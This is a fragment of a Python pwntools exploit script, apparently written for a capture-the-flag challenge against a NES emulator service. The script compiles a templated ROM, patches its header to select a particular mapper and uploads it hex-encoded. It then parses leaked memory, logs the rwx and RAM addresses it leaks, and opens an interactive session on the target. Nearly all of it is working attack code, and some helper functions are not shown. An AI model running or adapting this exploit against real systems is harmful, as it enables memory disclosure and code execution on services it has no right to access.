print(r.recvuntil(b"DD",drop=True))
temp = r.recvuntil(b"EE",drop=True)
print(len(temp))
data = b''
for i,b in enumerate(temp):
if not i%2:
data += b.to_bytes(1, 'little')
i = 0
print(len(data))
while(i < 0x800):
lol = u64(data[i:i+8])
lol2 = u64(data[i+8:i+0x10])
log.info(f'{hex(i+offset)}: {lol:#0{18}x} {lol2:#0{18}x}')
if lol == 0x10000000b and lol2 == 0:
bitch(1)
i += 0x10
def templated(offset):
log.info(f"offset: {hex(offset)}")
pwn_code = ""
with open("./rom/template.c", "r") as pwn:
pwn_code = pwn.read()
pwn_code = pwn_code.replace('XDOFFSET', f'{offset:#0{8}x}')
with open("./rom/pwn.c", "w") as pwn:
pwn.write(pwn_code)
def main():
global r
global offset
#for remote enumeration
#templated(offset)
os.chdir("./rom")
os.system("make all")
os.chdir("..")
spawn_remote()
with open("./pwn.nes", "rb") as f:
data = list(f.read())
#patch in dream mapper
data[6] = (data[6] & 0x0f) | (11 << 4)
to_send = hexlify(bytes(data))
#log.info(f"sending data> {to_send}")
r.sendlineafter(':\n', to_send)
with open("./test.nes", "wb") as out:
out.write(bytes(data))
f.close()
#dump()
data = leak()
log.info(f'rwx: {hex(data)}')
data = leak()
log.info(f'm_RAM: {hex(data)}')
data = leak()
log.info(f'm_RAM_rwx_off: {hex(data)}')
r.interactive()
r.close()
offset += 0x800
if __name__ == "__main__":
main()
#r.sendlineafter(b'GGGGG','ls')